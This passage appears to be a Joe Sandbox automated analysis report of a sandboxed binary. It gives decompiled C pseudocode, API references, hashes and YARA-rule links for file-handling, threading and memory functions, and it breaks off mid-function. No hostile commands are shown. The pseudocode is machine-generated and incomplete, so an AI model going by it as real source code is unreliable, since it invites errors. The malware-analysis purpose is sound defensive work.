Instruction ID: 88fd23d13b2165b9f29fbfc804bd3c55ab1378a3526c832d929a2e01daa6a8e0
Opcode Fuzzy Hash: 33641076fc2728d8ba28cdde326b41d1189eb1e6bfb453c54c8ab34be38ba523
Instruction Fuzzy Hash: 5B814E71D002499FCB21DFA9C881AEEBBB4AF09304F1480AEE555B7292C7785E85CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00404678, Relevance: 3.1, APIs: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00404678(intOrPtr* __ecx, void* __eflags) {
				void* _t63;
				signed char _t65;
				signed char _t67;
				signed int _t69;
				void* _t70;
				signed int _t79;
				signed int _t88;
				intOrPtr _t92;
				signed char _t94;
				intOrPtr* _t124;
				signed int _t128;
				void* _t129;
				void* _t134;

				_t134 = __eflags;
				E00418D80(E0041992B, _t129);
				_t124 = __ecx;
				_t94 = 1;
				 *(_t129 - 0xd) = _t94;
				E00404D7D(_t129 - 0x9c);
				E0040368D(_t129 - 0x74);
				 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
				_t63 = E00404DAF(_t129 - 0x9c, _t134,  *__ecx); // executed
				if(_t63 != 0) {
					_t65 =  *(_t129 - 0x7c) >> 4;
					__eflags = _t94 & _t65;
					if((_t94 & _t65) != 0) {
						_t67 =  *(_t129 - 0x7c) >> 0xa;
						__eflags = _t94 & _t67;
						if((_t94 & _t67) != 0) {
							_t14 = _t129 - 0xd;
							 *_t14 =  *(_t129 - 0xd) & 0x00000000;
							__eflags =  *_t14;
						}
						 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
						E00403204(_t67,  *((intOrPtr*)(_t129 - 0x74)));
						__eflags =  *(_t129 - 0xd);
						if(__eflags == 0) {
							L19:
							_t69 = E00404462( *_t124, 0);
							__eflags = _t69;
							if(_t69 != 0) {
								_t70 = E00404470( *_t124);
							} else {
								goto L20;
							}
						} else {
							E00403740(_t129 - 0x1c, __eflags, _t124);
							 *(_t129 - 4) = _t94;
							E00401EF8(_t129 - 0x1c, 0x5c);
							_t128 =  *(_t129 - 0x18);
							_t24 = _t129 - 0x2c;
							 *_t24 =  *(_t129 - 0x2c) | 0xffffffff;
							__eflags =  *_t24;
							 *(_t129 - 4) = 2;
							E0040368D(_t129 - 0x28);
							 *(_t129 - 4) = 3;
							E004051F7(_t129 - 0x2c, _t129 - 0x1c);
							E00404D7D(_t129 - 0x64);
							E0040368D(_t129 - 0x3c);
							 *(_t129 - 4) = 4;
							while(1) {
								_t79 = E00405233(_t129 - 0x2c, _t129 - 0x64);
								__eflags = _t79;
								if(_t79 == 0) {
									break;
								}
								__eflags = _t128 -  *(_t129 - 0x18);
								if(__eflags < 0) {
									_t92 =  *((intOrPtr*)(_t129 - 0x1c));
									 *(_t129 - 0x18) = _t128;
									_t39 = _t92 + _t128 * 2;
									 *_t39 =  *(_t92 + _t128 * 2) & 0x00000000;
									__eflags =  *_t39;
								}
								E0040399C(_t129 - 0x1c, __eflags, _t129 - 0x3c);
								__eflags = _t94 &  *(_t129 - 0x44) >> 0x00000004;
								if(__eflags == 0) {
									_t88 = E00404643( *((intOrPtr*)(_t129 - 0x1c)), __eflags);
								} else {
									_t88 = E00404678(_t129 - 0x1c, __eflags);
								}
								__eflags = _t88;
								if(_t88 == 0) {
									E00403204(E00403204(_t88,  *((intOrPtr*)(_t129 - 0x3c))),  *((intOrPtr*)(_t129 - 0x28)));
									_t65 = E00404B27(_t129 - 0x2c);
									_push( *((intOrPtr*)(_t129 - 0x1c)));
									goto L2;
								} else {
									continue;
								}
								goto L22;
							}
							E00403204(E00403204(_t79,  *((intOrPtr*)(_t129 - 0x3c))),  *((intOrPtr*)(_t129 - 0x28)));
							E00403204(E00404B27(_t129 - 0x2c),  *((intOrPtr*)(_t129 - 0x1c)));
							goto L19;
						}
					} else {
						SetLastError(0x10b);
						goto L1;
					}
				} else {
					L1:
					_push( *((intOrPtr*)(_t129 - 0x74)));
					L2:
					E00403204(_t65);
					L20:
					_t70 = 0;
				}
				L22:
				 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
				return _t70;
			}

0x00404678
0x0040467d
0x0040468d
0x0040468f
0x00404696
0x00404699
0x004046a1
0x004046a8
0x004046b2
0x004046b9
0x004046cc
0x004046cf
0x004046d1
0x004046e3
0x004046e6
0x004046e8
0x004046ea
0x004046ea
0x004046ea
0x004046ea
0x004046f1
0x004046f5
0x004046fa
0x004046ff
0x004047e5
0x004047e9
0x004047ee
0x004047f0
0x004047f8
0x00000000
0x00000000
0x00000000
0x00404705
0x00404709
0x00404713
0x00404716
0x0040471b
0x0040471e
0x0040471e
0x0040471e
0x00404725
0x00404729
0x00404735
0x00404739
0x00404741
0x00404749
0x0040474e
0x00404752
0x00404759
0x0040475e
0x00404760
0x00000000
0x00000000
0x00404762
0x00404765
0x00404767
0x0040476a
0x0040476d
0x0040476d
0x0040476d
0x0040476d
0x00404779
0x00404784
0x00404786
0x00404799
0x00404788
0x0040478b
0x0040478b
0x00404790
0x00404792
0x004047ab
0x004047b5
0x004047ba
0x00000000
0x00404794
0x00000000
0x00404794
0x00000000
0x00404792
0x004047cd
0x004047df
0x00000000
0x004047e4
0x004046d3
0x004046d8
0x00000000
0x004046d8
0x004046bb
0x004046bb
0x004046bb
0x004046be
0x004046be
0x004047f2
0x004047f2
0x004047f2
0x004047fd
0x00404803
0x0040480b

APIs

__EH_prolog.LIBCMT ref: 0040467D

Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4

SetLastError.KERNEL32(0000010B,?,769682C0,?,00000000), ref: 004046D8

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$ErrorLast
String ID:
API String ID: 2901101390-0
Opcode ID: 898bcb3355352a636011a3579ef66ddfafa831f9b504ef7429c9327cc1ab5d0d
Instruction ID: 7e41f2cfff906f94df3d93499aef528f4dd0a588830c47bb788408f42dae3ac8
Opcode Fuzzy Hash: 898bcb3355352a636011a3579ef66ddfafa831f9b504ef7429c9327cc1ab5d0d
Instruction Fuzzy Hash: 8D416C71C002089ADF14EBA6D442AEDBB74AF45318F2080BEE661731D2DB3D6A09DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040B290, Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0040B290(void* __ecx, void* __eflags) {
				intOrPtr* _t23;
				signed char _t24;
				void* _t26;
				void* _t46;
				void* _t48;
				void* _t53;

				_t53 = __eflags;
				E00418D80(E00419F70, _t48);
				_t46 = __ecx;
				E004037D2(__ecx + 0x10,  *((intOrPtr*)(_t48 + 8)));
				_t23 = E00403632(_t48 - 0x18, __ecx + 0x10,  *((intOrPtr*)(_t48 + 0xc)));
				 *(_t48 - 4) = 0;
				_t24 = E00404DAF(__ecx + 0x20, _t53,  *_t23); // executed
				asm("sbb bl, bl");
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				E00403204(_t24,  *((intOrPtr*)(_t48 - 0x18)));
				if( ~_t24 + 1 != 0) {
					_push(0x41c760);
					_push(_t48 + 8);
					 *((intOrPtr*)(_t48 + 8)) = 0x133061e;
					L00418E02();
				}
				_t26 = E004030D0(_t46 + 0x68);
				 *((intOrPtr*)(_t46 + 0x78)) = 0;
				 *((intOrPtr*)(_t46 + 0x84)) = 0;
				 *(_t46 + 0x58) =  *(_t46 + 0x58) & 0x00000000;
				 *(_t46 + 0x8c) =  *(_t46 + 0x8c) & 0x00000000;
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return _t26;
			}

0x0040b290
0x0040b295
0x0040b29f
0x0040b2aa
0x0040b2b7
0x0040b2c3
0x0040b2c6
0x0040b2d2
0x0040b2d4
0x0040b2da
0x0040b2e2
0x0040b2e7
0x0040b2ec
0x0040b2ed
0x0040b2f4
0x0040b2f4
0x0040b2fc
0x0040b304
0x0040b307
0x0040b30d
0x0040b311
0x0040b31b
0x0040b323

APIs

__EH_prolog.LIBCMT ref: 0040B295

Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4

Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208

_CxxThrowException.MSVCRT(?,0041C760), ref: 0040B2F4

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$ExceptionThrowfree
String ID:
API String ID: 1371406966-0
Opcode ID: ec4d247574fff5ead4947f581fa00135c9d74d8b5b33173528e34598dd795744
Instruction ID: 3991b56aa772d61d3444a8cef0fd9670766af5abd261621a3301c4c09fd1f304
Opcode Fuzzy Hash: ec4d247574fff5ead4947f581fa00135c9d74d8b5b33173528e34598dd795744
Instruction Fuzzy Hash: 11012175640204AAC725EF22C451BDEBFF4EF80314F00852FE892A32E1CB786A49CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00405303, Relevance: 3.0, APIs: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00405303(void** __ecx, long _a4, signed int _a8, long _a12, intOrPtr* _a16) {
				long _v8;
				signed int _t9;
				long _t11;
				void* _t12;
				intOrPtr* _t14;
				void* _t15;
				signed int _t21;
				long _t23;

				_push(__ecx);
				_t9 = _a8;
				_v8 = _t9;
				_t21 = _t9 >> 0x1f;
				_t11 = SetFilePointer( *__ecx, _a4,  &_v8, _a12); // executed
				_t23 = _t11;
				if(_t23 != 0xffffffff || GetLastError() == 0) {
					_t12 = E004190A0(_v8, 0, 0, 1);
					asm("adc edx, eax");
					_t14 = _a16;
					 *_t14 = _t12 + _t23;
					 *(_t14 + 4) = _t21;
					_t15 = 1;
				} else {
					_t15 = 0;
				}
				return _t15;
			}

0x00405306
0x00405307
0x00405310
0x0040531a
0x0040531f
0x00405325
0x0040532a
0x00405343
0x0040534e
0x00405350
0x00405353
0x00405355
0x00405358
0x00405336
0x00405336
0x00405336
0x0040535c

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040531F
GetLastError.KERNEL32(?,?,?,?), ref: 0040532C

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: e5f51623b6d1066f15c38e0f7a766acb83092e1d779a669a0f1b84784c969e98
Instruction ID: 9124dc6d7053f8d6efb0d5dd32d4d25d1ca9512a9ee8f9f64a9de147337f6b78
Opcode Fuzzy Hash: e5f51623b6d1066f15c38e0f7a766acb83092e1d779a669a0f1b84784c969e98
Instruction Fuzzy Hash: 11F04971600208ABCB11DF69DC05BDB3BE5EB49354F108165F915E72A0E6759D10AAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410B21, Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00410B21(void* __ecx) {
				void* _t15;
				intOrPtr _t25;
				void* _t30;
				intOrPtr _t32;

				E00418D80(E0041A5F8, _t30);
				_push(__ecx);
				_push(__ecx);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t25 =  *((intOrPtr*)(_t30 + 8));
				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
				_push(_t25); // executed
				_t15 = E00410864(__ecx); // executed
				if( *((char*)(__ecx + 0x3c)) != 0) {
					 *((char*)(_t25 + 0x14a)) = 1;
				}
				if(_t15 != 0x80004001) {
					 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
					return _t15;
				} else {
					_push(0x41de18);
					 *((char*)(_t30 - 0x11)) =  *((intOrPtr*)(_t30 + 0xb));
					_push(_t30 - 0x11);
					L00418E02();
					 *((char*)( *((intOrPtr*)(_t30 + 8)) + 0x14e)) = 1;
					return E00410B8A;
				}
			}

0x00410b26
0x00410b2b
0x00410b2c
0x00410b2d
0x00410b34
0x00410b37
0x00410b3c
0x00410b3d
0x00410b46
0x00410b48
0x00410b48
0x00410b54
0x00410b92
0x00410b9b
0x00410b56
0x00410b59
0x00410b5e
0x00410b64
0x00410b65
0x00410b6d
0x00410b79
0x00410b79

APIs

__EH_prolog.LIBCMT ref: 00410B26

Part of subcall function 00410864: __EH_prolog.LIBCMT ref: 00410869

_CxxThrowException.MSVCRT(?,0041DE18), ref: 00410B65

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$ExceptionThrow
String ID:
API String ID: 2366012087-0
Opcode ID: 8af01c6eb10b9063be972fec532e90461c8519683e3f33f3519498f04b14a68e
Instruction ID: 66cfeec8bba6f5a58313027dc29a8bde198ffc6f74079f781ea7209b80be1e28
Opcode Fuzzy Hash: 8af01c6eb10b9063be972fec532e90461c8519683e3f33f3519498f04b14a68e
Instruction Fuzzy Hash: 86F0FC71548344AEDB11DB98C4457EEBBA4EB55318F04405FF0449B241C7FCB9C487A9

Uniqueness

Uniqueness Score: -1.00%

Function 00418A80, Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418A80(intOrPtr* __ecx, void* __edx, char _a4) {
				char* _t3;
				long _t4;
				void* _t10;

				_t3 =  &_a4;
				__imp___beginthreadex(0, 0, __edx, _a4, 0, _t3, _t10); // executed
				 *__ecx = _t3;
				if(_t3 == 0) {
					_t4 = GetLastError();
					if(_t4 == 0) {
						return 1;
					}
					return _t4;
				} else {
					return 0;
				}
			}

0x00418a81
0x00418a94
0x00418a9d
0x00418aa2
0x00418aa9
0x00418ab1
0x00000000
0x00418ab3
0x00418ab8
0x00418aa4
0x00418aa6
0x00418aa6

APIs

_beginthreadex.MSVCRT ref: 00418A94
GetLastError.KERNEL32(?,?,769682C0,00000000,00000000), ref: 00418AA9

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ErrorLast_beginthreadex
String ID:
API String ID: 4034172046-0
Opcode ID: c548e9af719ead334f14ed1d54a67b1793e344066bbd5669ca46e26d0f3a0ecb
Instruction ID: 70daae52a94726005310dc0db4673b1cb6198bfb299c528c22bbb718e3dc4f27
Opcode Fuzzy Hash: c548e9af719ead334f14ed1d54a67b1793e344066bbd5669ca46e26d0f3a0ecb
Instruction Fuzzy Hash: D2E0E6B12052026FE3109B64DC15FA77698EF94781F44847EB545D6280EB749850C7B9

Uniqueness

Uniqueness Score: -1.00%

Function 00418A40, Relevance: 3.0, APIs: 2, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00418A40(void** __ecx) {
				void* _t1;
				int _t3;
				long _t4;
				intOrPtr* _t7;

				_t7 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0) {
					L5:
					return 0;
				}
				_t3 = FindCloseChangeNotification(_t1); // executed
				if(_t3 != 0) {
					 *_t7 = 0;
					goto L5;
				}
				_t4 = GetLastError();
				if(_t4 != 0) {
					return _t4;
				} else {
					return 1;
				}
			}

0x00418a41
0x00418a43
0x00418a47
0x00418a6b
0x00000000
0x00418a6b
0x00418a4a
0x00418a52
0x00418a65
0x00000000
0x00418a65
0x00418a54
0x00418a5c
0x00418a6e
0x00418a5e
0x00418a64
0x00418a64

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,004025E4,?,00000000,?,00000000,?,?,769682C0,00000000,00000000), ref: 00418A4A
GetLastError.KERNEL32(?,769682C0,00000000,00000000), ref: 00418A54

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 0433229ef2530785905c04bfe02dbd6fb0e4ed519826bd7185666009005914ad
Instruction ID: 7535ee298610e88dfaab19b27145df70c5ba92bd44e4c2e9d74370dd166c20af
Opcode Fuzzy Hash: 0433229ef2530785905c04bfe02dbd6fb0e4ed519826bd7185666009005914ad
Instruction Fuzzy Hash: EDD09E316141118FEB705F79BC087D726D8AF04791F15846FB450C2344EF68CDC146A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405FD6, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FD6(DWORD* __ecx) {
				int _t4;

				_t4 = GetProcessAffinityMask(GetCurrentProcess(), __ecx,  &(__ecx[1])); // executed
				return _t4;
			}

0x00405fe2
0x00405fe8

APIs

GetCurrentProcess.KERNEL32(?,?,00405FF7), ref: 00405FDB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00405FE2

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 07db69285f0a9f4bd27611239e22615ac5e837d892164ec821e022bab2d23e48
Instruction ID: 732ff7f231baee20a9cffd8d9fa0ed88e0eff740d633cb47fb09654a2f39704a
Opcode Fuzzy Hash: 07db69285f0a9f4bd27611239e22615ac5e837d892164ec821e022bab2d23e48
Instruction Fuzzy Hash: 80B092B1400104ABCE009BA0DE0C86B3E2CEA0C2013048468B215C1012DB3AC0018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004031DD, Relevance: 2.5, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004031DD(int _a4, char _a7) {
				void* _t5;
				char* _t7;

				_t5 = malloc(_a4); // executed
				if(_t5 == 0) {
					_push(0x41c8c8);
					_t7 =  &_a7;
					_push(_t7);
					L00418E02();
					return _t7;
				}
				return _t5;
			}

0x004031e3
0x004031ec
0x004031f1
0x004031f9
0x004031fc
0x004031fd
0x00000000
0x004031fd
0x00403203

APIs

malloc.MSVCRT ref: 004031E3
_CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ExceptionThrowmalloc
String ID:
API String ID: 2436765578-0
Opcode ID: a06ede8ce10373c961941a0e1058ae9254320e152fb985f8e6ab7cb75a938dad
Instruction ID: 21ad3b6c62fa819954115c8b0a5ff63e7c490964cbfc0d860bfe7ccd9a4adc8e
Opcode Fuzzy Hash: a06ede8ce10373c961941a0e1058ae9254320e152fb985f8e6ab7cb75a938dad
Instruction Fuzzy Hash: D9D0A73114434C7ACF016FE19C059CA3F5C9901671B00D46BF8588E116D634D3844758

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4B4, Relevance: 2.0, APIs: 1, Instructions: 536
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040D4B4() {
				signed int _t311;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t331;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t340;
				signed int _t342;
				signed int _t343;
				signed int _t347;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				intOrPtr _t358;
				signed int _t360;
				signed int _t361;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed int _t393;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t405;
				signed int _t407;
				intOrPtr _t408;
				signed int _t410;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t428;
				intOrPtr _t453;
				signed int _t459;
				signed int _t472;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t488;
				signed int _t494;
				void* _t496;
				void* _t498;

				E00418D80(E0041A39B, _t496);
				_t483 =  *(_t496 + 0x18);
				_t400 = _t483;
				 *((intOrPtr*)(_t496 - 0x10)) = _t498 - 0x9c;
				 *(_t496 - 4) = 0;
				 *(_t496 - 0x1c) = _t400;
				if(_t483 != 0) {
					 *((intOrPtr*)( *_t483 + 4))(_t483);
				}
				 *((intOrPtr*)(_t496 - 0x34)) = 0;
				 *(_t496 - 0x30) = 0;
				_t494 =  *(_t496 + 8);
				 *(_t496 + 0x1b) =  *((intOrPtr*)(_t496 + 0x10)) == 0xffffffff;
				 *(_t496 - 4) = 1;
				if( *(_t496 + 0x1b) != 0) {
					 *((intOrPtr*)(_t496 + 0x10)) =  *((intOrPtr*)(_t494 + 0x8c));
				}
				if( *((intOrPtr*)(_t496 + 0x10)) != 0) {
					_t484 = _t483 | 0xffffffff;
					__eflags = _t484;
					 *(_t496 + 8) = 0;
					while(1) {
						__eflags =  *(_t496 + 8) -  *((intOrPtr*)(_t496 + 0x10));
						if( *(_t496 + 8) >=  *((intOrPtr*)(_t496 + 0x10))) {
							break;
						}
						__eflags =  *(_t496 + 0x1b);
						if( *(_t496 + 0x1b) == 0) {
							_t393 =  *( *((intOrPtr*)(_t496 + 0xc)) +  *(_t496 + 8) * 4);
						} else {
							_t393 =  *(_t496 + 8);
						}
						_t472 =  *( *((intOrPtr*)(_t494 + 0x164)) + _t393 * 4);
						__eflags = _t472 - 0xffffffff;
						if(_t472 == 0xffffffff) {
							L20:
							 *(_t496 + 8) =  *(_t496 + 8) + 1;
							continue;
						} else {
							__eflags = _t472 - _t484;
							if(_t472 != _t484) {
								L15:
								_t477 =  *( *((intOrPtr*)(_t494 + 0x160)) + _t472 * 4);
								L16:
								 *(_t496 - 0x20) = _t477;
								while(1) {
									__eflags =  *(_t496 - 0x20) - _t393;
									if( *(_t496 - 0x20) > _t393) {
										break;
									}
									_t400 =  *(_t496 - 0x1c);
									 *((intOrPtr*)(_t496 - 0x34)) =  *((intOrPtr*)(_t496 - 0x34)) +  *((intOrPtr*)(( *(_t496 - 0x20) << 4) +  *((intOrPtr*)(_t494 + 0x88))));
									asm("adc [ebp-0x30], edx");
									 *(_t496 - 0x20) =  *(_t496 - 0x20) + 1;
								}
								_t44 = _t393 + 1; // 0x1
								_t477 = _t44;
								_t484 = _t472;
								goto L20;
							}
							__eflags = _t393 - _t477;
							if(_t393 >= _t477) {
								goto L16;
							}
							goto L15;
						}
					}
					_t485 =  *((intOrPtr*)( *_t400 + 0xc))(_t400,  *((intOrPtr*)(_t496 - 0x34)),  *(_t496 - 0x30));
					__eflags = _t485;
					if(_t485 == 0) {
						_push(0x38);
						_t410 = E004031DD();
						 *(_t496 + 8) = _t410;
						__eflags = _t410;
						 *(_t496 - 4) = 2;
						if(_t410 == 0) {
							_t486 = 0;
							__eflags = 0;
						} else {
							_t486 = E0040765F(_t410);
						}
						__eflags = _t486;
						 *(_t496 - 0x30) = _t486;
						 *(_t496 - 4) = 1;
						 *(_t496 - 0x24) = _t486;
						if(_t486 != 0) {
							 *((intOrPtr*)( *_t486 + 4))(_t486);
						}
						 *(_t496 - 4) = 3;
						E004076F5(_t486, _t400);
						E0040BC60(_t496 - 0xa8, __eflags, 1);
						 *(_t496 - 0x14) =  *(_t496 - 0x14) & 0x00000000;
						 *(_t496 - 4) = 5;
						 *((intOrPtr*)( *_t400))(_t400, 0x41b230, _t496 - 0x14, 0);
						_push(0x38);
						_t415 = E004031DD();
						 *(_t496 + 8) = _t415;
						__eflags = _t415;
						 *(_t496 - 4) = 6;
						if(_t415 == 0) {
							_t401 = 0;
							__eflags = 0;
						} else {
							_t401 = E0040DB8E(_t415);
						}
						__eflags = _t401;
						 *(_t496 - 4) = 5;
						 *(_t496 - 0x2c) = _t401;
						 *(_t496 - 0x18) = _t401;
						if(_t401 != 0) {
							 *((intOrPtr*)( *_t401 + 4))(_t401);
						}
						_t73 = _t401 + 0x30; // 0x30
						_t416 = _t73;
						 *(_t496 - 4) = 7;
						 *((intOrPtr*)(_t401 + 0x2c)) = _t494 + 0x30;
						E004063E5(_t416,  *(_t496 - 0x1c));
						__eflags =  *(_t496 + 0x14);
						 *(_t496 - 0x20) = 0;
						_t417 = _t416 & 0xffffff00 |  *(_t496 + 0x14) != 0x00000000;
						 *(_t401 + 0xc) = _t417;
						__eflags =  *(_t494 + 0x180);
						_t83 =  *(_t494 + 0x180) != 0;
						__eflags = _t83;
						 *((char*)(_t401 + 0xd)) = _t417 & 0xffffff00 | _t83;
						while(1) {
							_t402 = E004077D1(_t486);
							__eflags = _t402;
							if(_t402 != 0) {
								break;
							}
							_t474 =  *(_t496 - 0x20);
							__eflags = _t474 -  *((intOrPtr*)(_t496 + 0x10));
							if(_t474 <  *((intOrPtr*)(_t496 + 0x10))) {
								__eflags =  *(_t496 + 0x1b);
								 *((intOrPtr*)(_t496 - 0x3c)) = 0;
								 *((intOrPtr*)(_t496 - 0x38)) = 0;
								 *((intOrPtr*)(_t496 - 0x48)) = 0;
								 *((intOrPtr*)(_t496 - 0x44)) = 0;
								if( *(_t496 + 0x1b) == 0) {
									_t474 =  *( *((intOrPtr*)(_t496 + 0xc)) + _t474 * 4);
								}
								 *(_t496 - 0x40) = 1;
								_t488 =  *( *((intOrPtr*)(_t494 + 0x164)) + _t474 * 4);
								__eflags = _t488 - 0xffffffff;
								 *(_t496 + 0x14) = _t488;
								if(_t488 == 0xffffffff) {
									L67:
									_t403 =  *(_t496 - 0x20);
									asm("sbb eax, eax");
									_t311 = E0040D16C( *(_t496 - 0x2c), _t474,  !( ~( *(_t496 + 0x1b))) &  *((intOrPtr*)(_t496 + 0xc)) + _t403 * 0x00000004,  *(_t496 - 0x40));
									 *(_t496 + 0x14) = _t311;
									__eflags = _t311;
									 *(_t496 - 0x20) = _t403 +  *(_t496 - 0x40);
									if(_t311 == 0) {
